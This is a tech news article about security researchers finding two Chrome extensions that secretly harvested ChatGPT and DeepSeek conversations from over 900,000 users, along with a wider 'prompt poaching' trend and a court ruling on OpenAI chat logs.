Malicious browser extensions are harvesting ChatGPT conversations at massive scale

January 8, 2026 Security researchers have uncovered a widespread surveillance campaign targeting ChatGPT users. This raises fresh concerns about how much personal and professional information people are unknowingly exposing through AI tools.

According to new findings from cybersecurity firms OX Security and Secure Annex, two popular Chrome browser extensions with a combined user base of more than 900,000 have been found secretly collecting ChatGPT and DeepSeek conversations and transmitting them to remote servers controlled by unknown actors. 

The extensions, “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” and “AI Sidebar with Deepseek, ChatGPT, Claude, and more,” were found exfiltrating full chatbot conversations alongside browsing data at regular 30-minute intervals. These tools masqueraded as productivity tools while quietly exfiltrating user data. According to OX Security, the add-ons extracted chat messages directly from web pages using DOM scraping, storing and transmitting them to remote command-and-control servers.

The danger goes far beyond casual chats. Researchers say exfiltrated data can include corporate prompts, internal URLs, proprietary code, business strategies and personal information shared with AI tools. 

“This data can be weaponized for corporate espionage, identity theft, targeted phishing campaigns, or sold on underground forums,” OX Security warned, noting that employees who installed the extensions may have inadvertently exposed intellectual property, internal systems and customer data.

The campaign is part of a broader trend researchers have dubbed “prompt poaching,” the practice of covertly collecting AI prompts and responses through browser extensions. Secure Annex says the technique has already appeared in other extensions, including Urban VPN Proxy, which previously had millions of installations.

Prompt poaching is no longer limited to outright malicious software. Secure Annex also found that legitimate extensions, such as Similarweb and Sensor Tower’s Stayfocusd, collect AI conversations under updated terms of service. A January 2026 update explicitly states that data entered into AI tools, including prompts, uploaded files and outputs, may be collected for analytics.

The findings land amid mounting legal pressure on OpenAI itself. This week, a US federal judge upheld an initial ruling that ordered the company to turn over 20 million de-identified ChatGPT conversation logs to news organizations pursuing copyright claims. In his ruling, the judge rejected claims that user privacy would be unduly burdened. Although OpenAI maintains that shared data will be anonymized and restricted, privacy concerns remain riding on the fact that many users never expected their AI conversations, including deleted ones, to turn up as discovery data.



Top Stories

Related Articles

January 8, 2026 HSBC is reportedly locking some UK customers out of its mobile banking app after they installed a more...

January 8, 2026 Finnish eyewear startup IXI says it is preparing to launch smart glasses that automatically adjust focus in more...

January 8, 2026 D-Wave says it has solved a major technical bottleneck that has long limited the scalability of gate-model more...

January 7, 2026 CES 2026 kicked off with a bang on Jan. 6. It’s been two days of the four-day more...

Jim Love

Jim is an author and podcast host with over 40 years in technology.

Share:
Facebook
Twitter
LinkedIn